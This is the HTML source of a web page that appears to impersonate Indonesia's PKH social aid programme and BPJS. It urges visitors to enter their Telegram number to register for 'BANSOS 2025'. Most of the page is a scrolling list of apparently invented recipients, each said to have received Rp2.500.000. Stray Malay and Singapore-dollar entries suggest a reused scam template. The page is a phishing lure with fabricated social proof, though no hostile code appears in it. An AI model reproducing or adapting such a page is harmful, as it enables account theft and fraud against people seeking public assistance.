<!doctype html>
<html lang="en" class="h-100">

<head id="ctl00_Head1">
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta property="og:title" content="Bansos PKH 2025 : Persyaratan Kini Terbuka Kepada Rakyat Indonesia">
    <meta property="og:image" content="">
    <meta name="description" />
    <meta name="author" content="Info loker 2025" />
    <meta property="og:description" content="Bansos PKH 2025 : Persyaratan Kini Terbuka Kepada Rakyat Indonesia">
    <title>Bansos PKH 2025</title>
    <link rel="icon" type="image/x-icon" href="favicon.png" />
    <link rel="shortcut icon" href="favicon.png" type="image/x-icon">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/custom.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" />
    <script src="assets/js/jquery-3.7.1.min.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/vue.min.js"></script>
    <style type="text/css">
        .bd-placeholder-img {
            font-size: 1.125rem;
            text-anchor: middle;
            -webkit-user-select: none;
            -moz-user-select: none;
            user-select: none;
        }

        @media (min-width: 768px) {
            .bd-placeholder-img-lg {
                font-size: 3.5rem;
            }
        }

        /* Absolute Center Spinner */
        .loading {
            position: fixed;
            z-index: 999;
            height: 2em;
            width: 2em;
            overflow: show;
            margin: auto;
            top: 0;
            left: 0;
            bottom: 0;
            right: 0;
        }

        /* Transparent Overlay */
        .loading:before {
            content: '';
            display: block;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));

            background: -webkit-radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));
        }

        /* :not(:required) hides these rules from IE9 and below */
        .loading:not(:required) {
            /* hide "loading..." text */
            font: 0/0 a;
            color: transparent;
            text-shadow: none;
            background-color: transparent;
            border: 0;
        }

        .loading:not(:required):after {
            content: '';
            display: block;
            font-size: 10px;
            width: 1em;
            height: 1em;
            margin-top: -0.5em;
            -webkit-animation: spinner 150ms infinite linear;
            -moz-animation: spinner 150ms infinite linear;
            -ms-animation: spinner 150ms infinite linear;
            -o-animation: spinner 150ms infinite linear;
            animation: spinner 150ms infinite linear;
            border-radius: 0.5em;
            -webkit-box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
            box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
        }

        /* Animation */

        @-webkit-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @-moz-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @-o-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body class="d-flex flex-column h-100">

    <div id="loading"></div>

    <main class="flex-shrink-0">
        <div id="ctl00_divContainer" class="container container-narrow">
            <div class="text-center mt-2">
                <a id="ctl00_lnkMalay" disabled="disabled"
                    style="color:Black;font-weight:bold;text-decoration:none;">Bahasa Indonesia</a>
                <span id="ctl00_lblPipe_bm"> | </span>
                <a id="ctl00_lnkEng" href="">English</a>
                <span id="ctl00_lblPipe_bi"> | </span>
                <a id="ctl00_lnkChineseSimplified" href=""> 中文(简体) </a>
                <span id="ctl00_lblPipe_bc"> | </span>
                <a id="ctl00_lnkTamilInd" href="">தமிழ் </a>
            </div>
            <div class="header mt-3 text-center">
                <img src="assets/img/ini0.png" id="ctl00_logohead" class="img-fluid" width="450" />
            </div>
            <span id="ctl00_lblMsg"></span>
            <h2 class="fw-bold mt-2 page-header text-center ">
                <span id="ctl00_RecipientMasterContent_lblSubject">Masukkan Nomor Telegram Anda Untuk Daftar BANSOS
                    2025</span>
            </h2>
            <form>
            </form>
            <div class="_record-box">
                <div id="list" class="list-box">
                    <div class="list">

                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Danial Zainal</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Dayang Syarafana</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Mohammad Haszri</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Syahirah</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Aulia Hanifah</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Arif Syuaib</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Muh Zian Zakwan</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Azira Binti Abdul Khalid</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Nor Fatimah Binti Jailani</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Patimah Barkat</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Abby Nizzam</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Wahiidah Zaili</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Haifaa Ismail</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Hadif Khalish</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Zulkhairie</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Zulkhairie</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Azzahra</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Ayu Morsidi</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Nadiyah</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Aziyah Salleh</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Mareyah Rahim</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">kheairul zulfarhan</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">alwi shahreeza</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Hariz Iskandar</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Abdul Hanis</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Faridah</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Maleeh othman</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Nur Faizah Ja'afar</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Anisah Syahirah</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Nazirah Suhaili</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">zura rozaiman</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Hj Mat Jali Lamit</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Ali Hamad</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Qawiy Nina</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Lisdah binti mejeng</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Azwan fitri bin daud</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Joz johari nurhana</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Ain shaffiza noldin</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>
                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Hafizah Sani</span></div>
                                <div class="h2">Pencairan Rp2.500.000</div>
                            </div>
                        </div>

                        <div class="item">
                            <div class="record_logo">
                                <img src="assets/img/avatar.png" alt="">
                            </div>
                            <div class="center">
                                <div class="h1"><span class="name">Goh Zong Han</span></div>
                                <div class="h2">Successful S$ 1.000,00</div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <br>
    <div class="header mt-3 text-center">
        <img src="assets/img/ini1.png" id="ctl00_logohead" class="img-fluid" width="450" />
    </div>
    <footer class="footer mt-auto py-3">
        <div class="container">
            <div class="row">
                <div class="col-5">
                    <span class="text-white">
                        <span id="ctl00_lblCopyRight">2025 All Rights BPJS</span>
                    </span>
                </div>
                <div class="col">
                    <ul class="nav justify-content-end">
                        <li class="nav-item">
                            <a id="ctl00_lnkFaq" class="nav-link" href="">
                                <i class="bi-question-circle"></i>
                                <span id="ctl00_lblFAQ">Copyright</span></a>
                        </li>
                        <li class="nav-item">
                            <p id="ctl00_linkMerchList">
                                <a class="nav-link" href=""><i class="bi-shop"></i>
                                    <span id="ctl00_lblMerchList">Senarai Kedai</span></a>
                            </p>
                        </li>
                        <li class="nav-item">
                            <a href="" id="ctl00_linkContactUs" class="nav-link"><i class="bi-envelope"></i>
                                <span id="ctl00_lblctctus">Contact Person</span></a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </footer>
    <script>
        new Vue({
            el: '#app',
            data: {
                locale: {},
                uid: '2004219',
            },
            created() {
                $('#app').show();
                this.starScroll();
            },
            methods: {
                starScroll() {
                    var _this = this;
                    _this.scrollTimer && clearTimeout(_this.scrollTimer)
                    _this.scrollTimer = setTimeout(() => {
                        var $box = $("#list").find(".list:first");
                        $box.css({
                            marginTop: 0
                        })
                        var $item = $box.find(".item:first");
                        var outerHeight = $item.outerHeight(true)
                        $box.animate({
                            "marginTop": -outerHeight + "px"
                        }, 1000, function () {
                            $box.css({
                                marginTop: 0
                            }).find(".item:first").appendTo($box);
                            _this.starScroll();
                        })
                    }, 600);
                },
            },
        })
    </script>

</body>

</html>
